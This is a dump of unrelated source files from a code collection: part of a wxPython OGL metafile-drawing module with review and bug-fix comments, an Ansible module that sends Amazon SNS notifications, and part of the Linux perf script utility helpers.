        """Scale every stored point in place."""
        for i in range(self._noPoints):
            self._points[i] = wx.Point(self._points[i][0] * scaleX, self._points[i][1] * scaleY)

    def Translate(self, x, y):
        """Shift every stored point in place (requires mutable points)."""
        for i in range(self._noPoints):
            self._points[i][0] += x
            self._points[i][1] += y

    def Rotate(self, x, y, theta, sinTheta, cosTheta):
        """Rotate every point about (x, y)."""
        for i in range(self._noPoints):
            x1 = self._points[i][0]
            y1 = self._points[i][1]
            # Bug fix: the original stored an immutable tuple here, which made
            # any subsequent Translate() fail on item assignment.  Store a
            # mutable list instead; indexing behaviour is unchanged.
            self._points[i] = [
                x1 * cosTheta - y1 * sinTheta + x * (1 - cosTheta) + y * sinTheta,
                x1 * sinTheta + y1 * cosTheta + y * (1 - cosTheta) + x * sinTheta,
            ]

    def OnDrawOutline(self, dc, x, y, w, h, oldW, oldH):
        """Draw the drag outline: the polygon scaled from (oldW, oldH) to (w, h)."""
        dc.SetBrush(wx.TRANSPARENT_BRUSH)
        # Multiply all points by proportion of new size to old size.
        # NOTE(review): with integer w/oldW this is floor division on
        # Python 2 -- confirm callers pass floats.
        x_proportion = abs(w / oldW)
        y_proportion = abs(h / oldH)
        # Bug fix: the original comprehension reused the names x and y, which
        # leak out of a list comprehension under Python 2 and clobbered the
        # x/y parameters passed to DrawPolygon below (the outline was drawn
        # at the last point's coordinates instead of at (x, y)).
        scaled = [(x_proportion * px, y_proportion * py) for px, py in self._points]
        dc.DrawPolygon(scaled, x, y)

    def GetPerimeterPoint(self, x1, y1, x2, y2, xOffset, yOffset, attachmentMode):
        """Return the point where the line (x1,y1)-(x2,y2) meets the polygon."""
        # First check for situation where the line is vertical,
        # and we would want to connect to a point on that vertical --
        # oglFindEndForPolyline can't cope with this (the arrow
        # gets drawn to the wrong place).
        if attachmentMode == ATTACHMENT_MODE_NONE and x1 == x2:
            # Look for the point we'd be connecting to. This is
            # a heuristic...
            for point in self._points:
                if point[0] == 0:
                    if y2 > y1 and point[1] > 0:
                        return point[0]+xOffset, point[1]+yOffset
                    elif y2 < y1 and point[1] < 0:
                        return point[0]+xOffset, point[1]+yOffset
        return FindEndForPolyline([ p[0] + xOffset for p in self._points ],
                                  [ p[1] + yOffset for p in self._points ],
                                  x1, y1, x2, y2)
class PseudoMetaFile(object):
    """
    A simple metafile-like class which can load data from a Windows
    metafile on all platforms.

    It records drawing operations (DrawOp subclasses) together with the
    GDI objects (pens, brushes, fonts) those operations index into, and
    can replay, scale, translate and rotate the whole recording.
    """
    def __init__(self):
        self._currentRotation = 0
        self._rotateable = True
        self._width = 0.0
        self._height = 0.0
        self._outlinePen = None
        self._fillBrush = None
        self._outlineOp = -1        # index into self._ops of the outline op; -1 = none
        self._ops = []              # recorded DrawOp instances, in draw order
        self._gdiObjects = []       # pens/brushes/fonts indexed by OpSetGDI ops
        self._outlineColours = []   # GDI indices overridden by the outline pen
        self._fillColours = []      # GDI indices overridden by the fill brush

    def Clear(self):
        """Discard all recorded operations and GDI bookkeeping."""
        self._ops = []
        self._gdiObjects = []
        self._outlineColours = []
        self._fillColours = []
        # Bug fix: the original assigned -1 to self._outlineColours here,
        # clobbering the list created just above.  The -1 sentinel belongs
        # to the outline-op index.
        self._outlineOp = -1

    def IsValid(self):
        """True if at least one operation has been recorded."""
        return self._ops != []

    def GetOps(self):
        return self._ops

    def SetOutlineOp(self, op):
        self._outlineOp = op

    def GetOutlineOp(self):
        return self._outlineOp

    def SetOutlinePen(self, pen):
        self._outlinePen = pen

    def GetOutlinePen(self, pen=None):
        # Bug fix: the getter declared a spurious required 'pen' argument.
        # It is now optional (and ignored) so no-argument calls work while
        # existing callers stay compatible.
        return self._outlinePen

    def SetFillBrush(self, brush):
        self._fillBrush = brush

    def GetFillBrush(self):
        return self._fillBrush

    def SetSize(self, w, h):
        self._width = w
        self._height = h

    def SetRotateable(self, rot):
        self._rotateable = rot

    def GetRotateable(self):
        return self._rotateable

    def GetFillColours(self):
        return self._fillColours

    def GetOutlineColours(self):
        return self._outlineColours

    def Draw(self, dc, xoffset, yoffset):
        """Replay every recorded op on dc, shifted by the offsets."""
        for op in self._ops:
            op.Do(dc, xoffset, yoffset)

    def Scale(self, sx, sy):
        """Scale every op and the recorded overall size."""
        for op in self._ops:
            op.Scale(sx, sy)
        self._width *= sx
        self._height *= sy

    def Translate(self, x, y):
        """Shift every op by (x, y)."""
        for op in self._ops:
            op.Translate(x, y)

    def Rotate(self, x, y, theta):
        """Rotate about (x, y) to the absolute angle theta (radians)."""
        theta1 = theta - self._currentRotation
        if theta1 == 0:
            return
        cosTheta = math.cos(theta1)
        sinTheta = math.sin(theta1)
        # NOTE(review): the absolute angle theta is passed down while the
        # sin/cos values are of the delta theta1 -- confirm this matches
        # what the op classes expect.
        for op in self._ops:
            op.Rotate(x, y, theta, sinTheta, cosTheta)
        self._currentRotation = theta

    def LoadFromMetaFile(self, filename, rwidth=None, rheight=None):
        """Load operations from a Windows metafile (not implemented yet).

        rwidth/rheight are optional so that single-argument callers
        (e.g. DrawnShape.LoadFromMetaFile) no longer raise TypeError.
        """
        # Bug fix: os.path.exist does not exist -- the original always
        # raised AttributeError here; use os.path.exists.
        if not os.path.exists(filename):
            return False
        print("LoadFromMetaFile not implemented yet.")
        return False  # TODO

    # Scale to fit size
    def ScaleTo(self, w, h):
        """Scale the recording so it fits a w x h bounding box.

        NOTE(review): assumes _width/_height are non-zero; a zero size
        would raise ZeroDivisionError -- confirm callers guarantee this.
        """
        scaleX = w / self._width
        scaleY = h / self._height
        self.Scale(scaleX, scaleY)

    def GetBounds(self):
        """Return [minX, minY, maxX, maxY] over all recorded draw ops."""
        maxX, maxY, minX, minY = -99999.9, -99999.9, 99999.9, 99999.9

        for op in self._ops:
            if op.GetOp() in [DRAWOP_DRAW_LINE, DRAWOP_DRAW_RECT, DRAWOP_DRAW_ROUNDED_RECT, DRAWOP_DRAW_ELLIPSE, DRAWOP_DRAW_POINT, DRAWOP_DRAW_TEXT]:
                if op._x1 < minX:
                    minX = op._x1
                if op._x1 > maxX:
                    maxX = op._x1
                if op._y1 < minY:
                    minY = op._y1
                if op._y1 > maxY:
                    maxY = op._y1
                if op.GetOp() == DRAWOP_DRAW_LINE:
                    if op._x2 < minX:
                        minX = op._x2
                    if op._x2 > maxX:
                        maxX = op._x2
                    if op._y2 < minY:
                        minY = op._y2
                    if op._y2 > maxY:
                        maxY = op._y2
                elif op.GetOp() in [ DRAWOP_DRAW_RECT, DRAWOP_DRAW_ROUNDED_RECT, DRAWOP_DRAW_ELLIPSE]:
                    # (x2, y2) hold width/height for these ops.
                    if op._x1 + op._x2 < minX:
                        minX = op._x1 + op._x2
                    if op._x1 + op._x2 > maxX:
                        maxX = op._x1 + op._x2
                    if op._y1 + op._y2 < minY:
                        minY = op._y1 + op._y2
                    # Bug fix: the original compared against maxX here, so
                    # the bottom edge could never extend maxY.
                    if op._y1 + op._y2 > maxY:
                        maxY = op._y1 + op._y2
            elif op.GetOp() == DRAWOP_DRAW_ARC:
                # TODO: don't yet know how to calculate the bounding box
                # for an arc. So pretend it's a line; to get a correct
                # bounding box, draw a blank rectangle first, of the
                # correct size.
                if op._x1 < minX:
                    minX = op._x1
                if op._x1 > maxX:
                    maxX = op._x1
                if op._y1 < minY:
                    minY = op._y1
                if op._y1 > maxY:
                    maxY = op._y1
                if op._x2 < minX:
                    minX = op._x2
                if op._x2 > maxX:
                    maxX = op._x2
                if op._y2 < minY:
                    minY = op._y2
                if op._y2 > maxY:
                    maxY = op._y2
            elif op.GetOp() in [DRAWOP_DRAW_POLYLINE, DRAWOP_DRAW_POLYGON, DRAWOP_DRAW_SPLINE]:
                for point in op._points:
                    if point[0] < minX:
                        minX = point[0]
                    if point[0] > maxX:
                        maxX = point[0]
                    if point[1] < minY:
                        minY = point[1]
                    if point[1] > maxY:
                        maxY = point[1]

        return [minX, minY, maxX, maxY]

    # Calculate size from current operations
    def CalculateSize(self, shape):
        """Recompute and store the metafile size; mirror it onto shape if given."""
        boundMinX, boundMinY, boundMaxX, boundMaxY = self.GetBounds()

        # By Pierre Hjälm: This is NOT in the old version, which
        # gets this totally wrong. Since the drawing is centered, we
        # cannot get the width by measuring from left to right, we
        # must instead make enough room to handle the largest
        # coordinates
        #self.SetSize(boundMaxX - boundMinX, boundMaxY - boundMinY)
        w = max(abs(boundMinX), abs(boundMaxX)) * 2
        h = max(abs(boundMinY), abs(boundMaxY)) * 2
        self.SetSize(w, h)

        if shape:
            shape.SetWidth(self._width)
            shape.SetHeight(self._height)

    # Set of functions for drawing into a pseudo metafile
    def DrawLine(self, pt1, pt2):
        op = OpDraw(DRAWOP_DRAW_LINE, pt1[0], pt1[1], pt2[0], pt2[1])
        self._ops.append(op)

    def DrawRectangle(self, rect):
        op = OpDraw(DRAWOP_DRAW_RECT, rect[0], rect[1], rect[2], rect[3])
        self._ops.append(op)

    def DrawRoundedRectangle(self, rect, radius):
        op = OpDraw(DRAWOP_DRAW_ROUNDED_RECT, rect[0], rect[1], rect[2], rect[3])
        op._radius = radius
        self._ops.append(op)

    def DrawEllipse(self, rect):
        op = OpDraw(DRAWOP_DRAW_ELLIPSE, rect[0], rect[1], rect[2], rect[3])
        self._ops.append(op)

    def DrawArc(self, centrePt, startPt, endPt):
        # Centre is stored in (x1, y1), start in (x2, y2), end in (x3, y3).
        op = OpDraw(DRAWOP_DRAW_ARC, centrePt[0], centrePt[1], startPt[0], startPt[1])
        op._x3, op._y3 = endPt
        self._ops.append(op)

    def DrawEllipticArc(self, rect, startAngle, endAngle):
        # Angles are stored in radians in (x3, y3).
        startAngleRadians = startAngle * math.pi * 2 / 360
        endAngleRadians = endAngle * math.pi * 2 / 360
        op = OpDraw(DRAWOP_DRAW_ELLIPTIC_ARC, rect[0], rect[1], rect[2], rect[3])
        op._x3 = startAngleRadians
        op._y3 = endAngleRadians
        self._ops.append(op)

    def DrawPoint(self, pt):
        op = OpDraw(DRAWOP_DRAW_POINT, pt[0], pt[1], 0, 0)
        self._ops.append(op)

    def DrawText(self, text, pt):
        op = OpDraw(DRAWOP_DRAW_TEXT, pt[0], pt[1], 0, 0)
        op._textString = text
        self._ops.append(op)

    def DrawLines(self, pts):
        op = OpPolyDraw(DRAWOP_DRAW_POLYLINE, pts)
        self._ops.append(op)

    # flags:
    # oglMETAFLAGS_OUTLINE: will be used for drawing the outline and
    #                       also drawing lines/arrows at the circumference.
    # oglMETAFLAGS_ATTACHMENTS: will be used for initialising attachment
    #                       points at the vertices (perhaps a rare case...)
    def DrawPolygon(self, pts, flags = 0):
        op = OpPolyDraw(DRAWOP_DRAW_POLYGON, pts)
        self._ops.append(op)
        if flags & METAFLAGS_OUTLINE:
            self._outlineOp = len(self._ops) - 1

    def DrawSpline(self, pts):
        op = OpPolyDraw(DRAWOP_DRAW_SPLINE, pts)
        self._ops.append(op)

    def SetClippingRect(self, rect):
        # Bug fix: the original constructed the op but never appended it,
        # so SetClippingRect silently did nothing.
        self._ops.append(OpSetClipping(DRAWOP_SET_CLIPPING_RECT, rect[0], rect[1], rect[2], rect[3]))

    def DestroyClippingRect(self):
        op = OpSetClipping(DRAWOP_DESTROY_CLIPPING_RECT, 0, 0, 0, 0)
        self._ops.append(op)

    def SetPen(self, pen, isOutline = False):
        self._gdiObjects.append(pen)
        op = OpSetGDI(DRAWOP_SET_PEN, self, len(self._gdiObjects) - 1)
        self._ops.append(op)
        if isOutline:
            self._outlineColours.append(len(self._gdiObjects) - 1)

    def SetBrush(self, brush, isFill = False):
        self._gdiObjects.append(brush)
        op = OpSetGDI(DRAWOP_SET_BRUSH, self, len(self._gdiObjects) - 1)
        self._ops.append(op)
        if isFill:
            self._fillColours.append(len(self._gdiObjects) - 1)

    def SetFont(self, font):
        self._gdiObjects.append(font)
        op = OpSetGDI(DRAWOP_SET_FONT, self, len(self._gdiObjects) - 1)
        self._ops.append(op)

    def SetTextColour(self, colour):
        op = OpSetGDI(DRAWOP_SET_TEXT_COLOUR, self, 0)
        op._r, op._g, op._b = colour.Red(), colour.Green(), colour.Blue()
        self._ops.append(op)

    def SetBackgroundColour(self, colour):
        op = OpSetGDI(DRAWOP_SET_BK_COLOUR, self, 0)
        op._r, op._g, op._b = colour.Red(), colour.Green(), colour.Blue()
        self._ops.append(op)

    def SetBackgroundMode(self, mode):
        op = OpSetGDI(DRAWOP_SET_BK_MODE, self, 0)
        # Bug fix: the original dropped 'mode', but OpSetGDI.Do reads
        # self._mode when replaying DRAWOP_SET_BK_MODE.
        op._mode = mode
        self._ops.append(op)
class DrawnShape(RectangleShape):
    """
    Draws a pseudo-metafile shape, which can be loaded from a simple
    Windows metafile.

    wxDrawnShape allows you to specify a different shape for each of four
    orientations (North, West, South and East). It also provides a set of
    drawing functions for programmatic drawing of a shape, so that during
    construction of the shape you can draw into it as if it were a device
    context.

    Derived from:
      RectangleShape
    """
    def __init__(self):
        RectangleShape.__init__(self, 100, 50)
        self._saveToFile = True
        self._currentAngle = DRAWN_ANGLE_0
        # One metafile per orientation: 0, 90, 180 and 270 degrees.
        self._metafiles = (PseudoMetaFile(), PseudoMetaFile(),
                           PseudoMetaFile(), PseudoMetaFile())

    def OnDraw(self, dc):
        """Draw the metafile for the current angle (shadow first, if enabled)."""
        # Pass pen and brush in case we have force outline
        # and fill colours
        if self._shadowMode != SHADOW_NONE:
            if self._shadowBrush:
                self._metafiles[self._currentAngle]._fillBrush = self._shadowBrush
            self._metafiles[self._currentAngle]._outlinePen = wx.Pen(wx.WHITE, 1, wx.TRANSPARENT)
            self._metafiles[self._currentAngle].Draw(dc, self._xpos + self._shadowOffsetX, self._ypos + self._shadowOffsetY)
        self._metafiles[self._currentAngle]._outlinePen = self._pen
        self._metafiles[self._currentAngle]._fillBrush = self._brush
        self._metafiles[self._currentAngle].Draw(dc, self._xpos, self._ypos)

    def SetSize(self, w, h, recursive = True):
        """Resize the shape, rescaling every valid metafile to match."""
        self.SetAttachmentSize(w, h)

        if self.GetWidth() == 0.0:
            scaleX = 1
        else:
            scaleX = w / self.GetWidth()
        if self.GetHeight() == 0.0:
            scaleY = 1
        else:
            scaleY = h / self.GetHeight()

        for i in range(4):
            if self._metafiles[i].IsValid():
                self._metafiles[i].Scale(scaleX, scaleY)

        self._width = w
        self._height = h
        self.SetDefaultRegionSize()

    def Scale(self, sx, sy):
        """Scale the shape by the given amount."""
        for i in range(4):
            if self._metafiles[i].IsValid():
                self._metafiles[i].Scale(sx, sy)
                self._metafiles[i].CalculateSize(self)

    def Translate(self, x, y):
        """Translate the shape by the given amount."""
        for i in range(4):
            if self._metafiles[i].IsValid():
                self._metafiles[i].Translate(x, y)
                self._metafiles[i].CalculateSize(self)

    # theta is absolute rotation from the zero position
    def Rotate(self, x, y, theta):
        """Rotate about the given axis by the given amount in radians."""
        self._currentAngle = self.DetermineMetaFile(theta)

        if self._currentAngle == 0:
            # Rotate metafile
            if not self._metafiles[0].GetRotateable():
                return
            self._metafiles[0].Rotate(x, y, theta)

        actualTheta = theta - self._rotation

        # Rotate attachment points
        sinTheta = math.sin(actualTheta)
        cosTheta = math.cos(actualTheta)

        # NOTE(review): the '+ x * sinTheta' term in point._y below has the
        # opposite sign of the standard rotation derivation -- confirm
        # against the upstream OGL implementation before changing.
        for point in self._attachmentPoints:
            x1 = point._x
            y1 = point._y

            point._x = x1 * cosTheta - y1 * sinTheta + x * (1.0 - cosTheta) + y * sinTheta
            point._y = x1 * sinTheta + y1 * cosTheta + y * (1.0 - cosTheta) + x * sinTheta

        self._rotation = theta

        self._metafiles[self._currentAngle].CalculateSize(self)

    # Which metafile do we use now? Based on current rotation and validity
    # of metafiles.
    def DetermineMetaFile(self, rotation):
        """Pick the metafile index (0-3) matching a 0/90/180/270 rotation."""
        tolerance = 0.0001
        angles = [0.0, math.pi / 2, math.pi, 3 * math.pi / 2]

        whichMetaFile = 0
        for i in range(4):
            if RoughlyEqual(rotation, angles[i], tolerance):
                whichMetaFile = i
                break

        # Fall back to the base orientation if that metafile is empty.
        if whichMetaFile > 0 and not self._metafiles[whichMetaFile].IsValid():
            whichMetaFile = 0

        return whichMetaFile

    def OnDrawOutline(self, dc, x, y, w, h):
        """Draw the drag outline, using the metafile's outline op if set."""
        if self._metafiles[self._currentAngle].GetOutlineOp() != -1:
            op = self._metafiles[self._currentAngle].GetOps()[self._metafiles[self._currentAngle].GetOutlineOp()]
            if op.OnDrawOutline(dc, x, y, w, h, self._width, self._height):
                return

        # Default... just use a rectangle
        RectangleShape.OnDrawOutline(self, dc, x, y, w, h)

    # Get the perimeter point using the special outline op, if there is one,
    # otherwise use default wxRectangleShape scheme
    def GetPerimeterPoint(self, x1, y1, x2, y2):
        """Return where the line (x1,y1)-(x2,y2) crosses the shape boundary."""
        if self._metafiles[self._currentAngle].GetOutlineOp() != -1:
            op = self._metafiles[self._currentAngle].GetOps()[self._metafiles[self._currentAngle].GetOutlineOp()]
            p = op.GetPerimeterPoint(x1, y1, x2, y2, self.GetX(), self.GetY(), self.GetAttachmentMode())
            if p:
                return p
        return RectangleShape.GetPerimeterPoint(self, x1, y1, x2, y2)

    def LoadFromMetaFile(self, filename):
        """Load a (very simple) Windows metafile, created for example by
        Top Draw, the Windows shareware graphics package."""
        # NOTE(review): PseudoMetaFile.LoadFromMetaFile historically required
        # extra rwidth/rheight arguments; confirm its signature accepts a
        # single filename in this codebase.
        return self._metafiles[0].LoadFromMetaFile(filename)

    # Set of functions for drawing into a pseudo metafile.
    # They use integers, but doubles are used internally for accuracy
    # when scaling.
    def DrawLine(self, pt1, pt2):
        self._metafiles[self._currentAngle].DrawLine(pt1, pt2)

    def DrawRectangle(self, rect):
        self._metafiles[self._currentAngle].DrawRectangle(rect)

    def DrawRoundedRectangle(self, rect, radius):
        """Draw a rounded rectangle.

        radius is the corner radius. If radius is negative, it expresses
        the radius as a proportion of the smallest dimension of the rectangle.
        """
        self._metafiles[self._currentAngle].DrawRoundedRectangle(rect, radius)

    def DrawEllipse(self, rect):
        self._metafiles[self._currentAngle].DrawEllipse(rect)

    def DrawArc(self, centrePt, startPt, endPt):
        """Draw an arc."""
        self._metafiles[self._currentAngle].DrawArc(centrePt, startPt, endPt)

    def DrawEllipticArc(self, rect, startAngle, endAngle):
        """Draw an elliptic arc."""
        self._metafiles[self._currentAngle].DrawEllipticArc(rect, startAngle, endAngle)

    def DrawPoint(self, pt):
        self._metafiles[self._currentAngle].DrawPoint(pt)

    def DrawText(self, text, pt):
        self._metafiles[self._currentAngle].DrawText(text, pt)

    def DrawLines(self, pts):
        self._metafiles[self._currentAngle].DrawLines(pts)

    def DrawPolygon(self, pts, flags = 0):
        """Draw a polygon.

        flags can be one or more of:
        METAFLAGS_OUTLINE (use this polygon for the drag outline) and
        METAFLAGS_ATTACHMENTS (use the vertices of this polygon for attachments).
        """
        # Bug fix: the original tested 'flags and METAFLAGS_ATTACHMENTS',
        # which is true for ANY non-zero flags value (the constant is always
        # truthy), so passing METAFLAGS_OUTLINE alone also rebuilt the
        # attachment points.  A bitwise test checks the intended flag.
        if flags & METAFLAGS_ATTACHMENTS:
            self.ClearAttachments()
            for i in range(len(pts)):
                self._attachmentPoints.append(AttachmentPoint(i,pts[i][0],pts[i][1]))
        self._metafiles[self._currentAngle].DrawPolygon(pts, flags)

    def DrawSpline(self, pts):
        self._metafiles[self._currentAngle].DrawSpline(pts)

    def SetClippingRect(self, rect):
        """Set the clipping rectangle."""
        self._metafiles[self._currentAngle].SetClippingRect(rect)

    def DestroyClippingRect(self):
        """Destroy the clipping rectangle."""
        self._metafiles[self._currentAngle].DestroyClippingRect()

    def SetDrawnPen(self, pen, isOutline = False):
        """Set the pen for this metafile.

        If isOutline is True, this pen is taken to indicate the outline
        (and if the outline pen is changed for the whole shape, the pen
        will be replaced with the outline pen).
        """
        self._metafiles[self._currentAngle].SetPen(pen, isOutline)

    def SetDrawnBrush(self, brush, isFill = False):
        """Set the brush for this metafile.

        If isFill is True, the brush is used as the fill brush.
        """
        self._metafiles[self._currentAngle].SetBrush(brush, isFill)

    def SetDrawnFont(self, font):
        self._metafiles[self._currentAngle].SetFont(font)

    def SetDrawnTextColour(self, colour):
        """Set the current text colour for the current metafile."""
        self._metafiles[self._currentAngle].SetTextColour(colour)

    def SetDrawnBackgroundColour(self, colour):
        """Set the current background colour for the current metafile."""
        self._metafiles[self._currentAngle].SetBackgroundColour(colour)

    def SetDrawnBackgroundMode(self, mode):
        """Set the current background mode for the current metafile."""
        self._metafiles[self._currentAngle].SetBackgroundMode(mode)

    def CalculateSize(self):
        """Calculate the wxDrawnShape size from the current metafile.

        Call this after you have drawn into the shape.
        """
        self._metafiles[self._currentAngle].CalculateSize(self)

    def DrawAtAngle(self, angle):
        """Set the metafile for the given orientation, which can be one of:

        * DRAWN_ANGLE_0
        * DRAWN_ANGLE_90
        * DRAWN_ANGLE_180
        * DRAWN_ANGLE_270
        """
        self._currentAngle = angle

    def GetAngle(self):
        """Return the current orientation, which can be one of:

        * DRAWN_ANGLE_0
        * DRAWN_ANGLE_90
        * DRAWN_ANGLE_180
        * DRAWN_ANGLE_270
        """
        return self._currentAngle

    def GetRotation(self):
        """Return the current rotation of the shape in radians."""
        return self._rotation

    def SetSaveToFile(self, save):
        """If save is True, the image will be saved along with the shape's
        other attributes. The reason why this might not be desirable is that
        if there are many shapes with the same image, it would be more
        efficient for the application to save one copy, and not duplicate
        the information for every shape. The default is True.
        """
        self._saveToFile = save

    def GetMetaFile(self, which = 0):
        """Return a reference to the internal 'pseudo-metafile'."""
        return self._metafiles[which]
| agpl-3.0 |
stefanweller/ansible-modules-extras | notification/sns.py | 44 | 5736 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# (c) 2014, Michael J. Schultz <mjschultz@gmail.com>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
DOCUMENTATION = """
module: sns
short_description: Send Amazon Simple Notification Service (SNS) messages
description:
- The M(sns) module sends notifications to a topic on your Amazon SNS account
version_added: 1.6
author: "Michael J. Schultz (@mjschultz)"
options:
msg:
description:
- Default message to send.
required: true
aliases: [ "default" ]
subject:
description:
- Subject line for email delivery.
required: false
topic:
description:
- The topic you want to publish to.
required: true
email:
description:
- Message to send to email-only subscription
required: false
sqs:
description:
- Message to send to SQS-only subscription
required: false
sms:
description:
- Message to send to SMS-only subscription
required: false
http:
description:
- Message to send to HTTP-only subscription
required: false
https:
description:
- Message to send to HTTPS-only subscription
required: false
aws_secret_key:
description:
- AWS secret key. If not set then the value of the AWS_SECRET_KEY environment variable is used.
required: false
default: None
aliases: ['ec2_secret_key', 'secret_key']
aws_access_key:
description:
- AWS access key. If not set then the value of the AWS_ACCESS_KEY environment variable is used.
required: false
default: None
aliases: ['ec2_access_key', 'access_key']
region:
description:
- The AWS region to use. If not specified then the value of the EC2_REGION environment variable, if any, is used.
required: false
aliases: ['aws_region', 'ec2_region']
requirements: [ "boto" ]
"""
EXAMPLES = """
- name: Send default notification message via SNS
local_action:
module: sns
msg: "{{ inventory_hostname }} has completed the play."
subject: "Deploy complete!"
topic: "deploy"
- name: Send notification messages via SNS with short message for SMS
local_action:
module: sns
msg: "{{ inventory_hostname }} has completed the play."
sms: "deployed!"
subject: "Deploy complete!"
topic: "deploy"
"""
import sys
from ansible.module_utils.basic import *
from ansible.module_utils.ec2 import *
try:
import boto
import boto.ec2
import boto.sns
HAS_BOTO = True
except ImportError:
HAS_BOTO = False
def arn_topic_lookup(connection, short_topic):
    """Resolve a short SNS topic name to its full ARN, or None if absent."""
    # Topic names cannot contain ':', so matching on the ':name' suffix of
    # each ARN is unambiguous.
    suffix = ':' + short_topic
    response = connection.get_all_topics()
    result = response[u'ListTopicsResponse'][u'ListTopicsResult']
    for entry in result[u'Topics']:
        arn = entry[u'TopicArn']
        if arn.endswith(suffix):
            return arn
    return None
def main():
    """Module entry point: publish a message to an Amazon SNS topic.

    Builds the Ansible argument spec, connects to SNS in the configured
    region, resolves a short topic name to its full ARN, assembles a
    per-protocol JSON message structure and publishes it.  All failure
    paths exit through module.fail_json().
    """
    argument_spec = ec2_argument_spec()
    argument_spec.update(
        dict(
            msg=dict(type='str', required=True, aliases=['default']),
            subject=dict(type='str', default=None),
            topic=dict(type='str', required=True),
            email=dict(type='str', default=None),
            sqs=dict(type='str', default=None),
            sms=dict(type='str', default=None),
            http=dict(type='str', default=None),
            https=dict(type='str', default=None),
        )
    )

    module = AnsibleModule(argument_spec=argument_spec)

    if not HAS_BOTO:
        module.fail_json(msg='boto required for this module')

    msg = module.params['msg']
    subject = module.params['subject']
    topic = module.params['topic']
    email = module.params['email']
    sqs = module.params['sqs']
    sms = module.params['sms']
    http = module.params['http']
    https = module.params['https']

    region, ec2_url, aws_connect_params = get_aws_connection_info(module)
    if not region:
        module.fail_json(msg="region must be specified")
    try:
        connection = connect_to_aws(boto.sns, region, **aws_connect_params)
    # Bug fix: 'except X, e' is a SyntaxError under Python 3; the
    # 'as' form is valid on Python 2.6+ as well.
    except boto.exception.NoAuthHandlerFound as e:
        module.fail_json(msg=str(e))

    # .publish() takes full ARN topic id, but I'm lazy and type shortnames
    # so do a lookup (topics cannot contain ':', so thats the decider)
    if ':' in topic:
        arn_topic = topic
    else:
        arn_topic = arn_topic_lookup(connection, topic)
    if not arn_topic:
        module.fail_json(msg='Could not find topic: {}'.format(topic))

    # Per-protocol overrides: the 'default' message is used for any
    # subscription type that is not explicitly given.
    dict_msg = {'default': msg}
    if email:
        dict_msg.update(email=email)
    if sqs:
        dict_msg.update(sqs=sqs)
    if sms:
        dict_msg.update(sms=sms)
    if http:
        dict_msg.update(http=http)
    if https:
        dict_msg.update(https=https)

    json_msg = json.dumps(dict_msg)
    try:
        connection.publish(topic=arn_topic, subject=subject,
                           message_structure='json', message=json_msg)
    except boto.exception.BotoServerError as e:
        module.fail_json(msg=str(e))

    module.exit_json(msg="OK")
main()
| gpl-3.0 |
fell978/kernel_huawei | tools/perf/scripts/python/Perf-Trace-Util/lib/Perf/Trace/Util.py | 12527 | 1935 | # Util.py - Python extension for perf script, miscellaneous utility code
#
# Copyright (C) 2010 by Tom Zanussi <tzanussi@gmail.com>
#
# This software may be distributed under the terms of the GNU General
# Public License ("GPL") version 2 as published by the Free Software
# Foundation.
import errno, os
# futex(2) operation codes and flag bits (mirrors linux/futex.h).
FUTEX_WAIT = 0
FUTEX_WAKE = 1
FUTEX_PRIVATE_FLAG = 128
FUTEX_CLOCK_REALTIME = 256
# Mask that strips the flag bits above, leaving the bare futex command.
FUTEX_CMD_MASK = ~(FUTEX_PRIVATE_FLAG | FUTEX_CLOCK_REALTIME)
# Nanoseconds in one second; the base unit for the helpers below.
NSECS_PER_SEC    = 1000000000

def avg(total, n):
    """Return the mean of a running total over n samples.

    NOTE(review): uses '/', which truncates for int inputs on Python 2
    but yields a float on Python 3 -- confirm which is intended.
    """
    return total / n

def nsecs(secs, nsecs):
    """Combine a (seconds, nanoseconds) pair into total nanoseconds."""
    return secs * NSECS_PER_SEC + nsecs

def nsecs_secs(nsecs):
    """Whole seconds in a nanosecond count.

    Uses floor division so the result stays integral on Python 3 as well
    (identical to the Python 2 behaviour of '/').
    """
    return nsecs // NSECS_PER_SEC

def nsecs_nsecs(nsecs):
    """Sub-second remainder of a nanosecond count."""
    return nsecs % NSECS_PER_SEC

def nsecs_str(nsecs):
    """Format a nanosecond count as 'SSSSS.NNNNNNNNN'.

    Bug fix: the original ended the assignment with a trailing comma, so
    a 1-tuple (not a string) was returned; it also shadowed the builtin
    'str'.  Return the formatted string directly.
    """
    return "%5u.%09u" % (nsecs_secs(nsecs), nsecs_nsecs(nsecs))
def add_stats(dict, key, value):
    """Fold value into dict[key], stored as a (min, max, avg, count) tuple.

    The 'avg' field is a halving running average ((old_avg + value) / 2),
    not a true mean -- kept for compatibility with existing callers.
    The parameter name 'dict' shadows the builtin but is retained so the
    external interface is unchanged.
    """
    # Bug fix: dict.has_key() was removed in Python 3; 'in' works on both.
    if key not in dict:
        dict[key] = (value, value, value, 1)
    else:
        lo, hi, mean, count = dict[key]
        if value < lo:
            lo = value
        if value > hi:
            hi = value
        mean = (mean + value) / 2
        dict[key] = (lo, hi, mean, count + 1)
def clear_term():
    """Clear the terminal: cursor home (ESC[H) then erase display (ESC[2J)."""
    # Named pieces for readability; the printed bytes are identical to the
    # original single escape-sequence literal.
    home = "\x1b[H"
    wipe = "\x1b[2J"
    print(home + wipe)
# Tracks whether we already warned about the missing audit module, so the
# hint is printed at most once.
audit_package_warned = False

try:
    import audit
    # Map uname machine strings to the audit library's machine ids.
    machine_to_id = {
        'x86_64': audit.MACH_86_64,
        'alpha' : audit.MACH_ALPHA,
        'ia64'  : audit.MACH_IA64,
        'ppc'   : audit.MACH_PPC,
        'ppc64' : audit.MACH_PPC64,
        's390'  : audit.MACH_S390,
        's390x' : audit.MACH_S390X,
        'i386'  : audit.MACH_X86,
        'i586'  : audit.MACH_X86,
        'i686'  : audit.MACH_X86,
    }
    try:
        machine_to_id['armeb'] = audit.MACH_ARMEB
    # Older audit bindings lack MACH_ARMEB; skip it then.
    except AttributeError:
        pass
    machine_id = machine_to_id[os.uname()[4]]
# ImportError (no audit module) or KeyError (unknown machine) both mean we
# cannot resolve syscall names; warn once and fall back to numeric ids.
except Exception:
    if not audit_package_warned:
        audit_package_warned = True
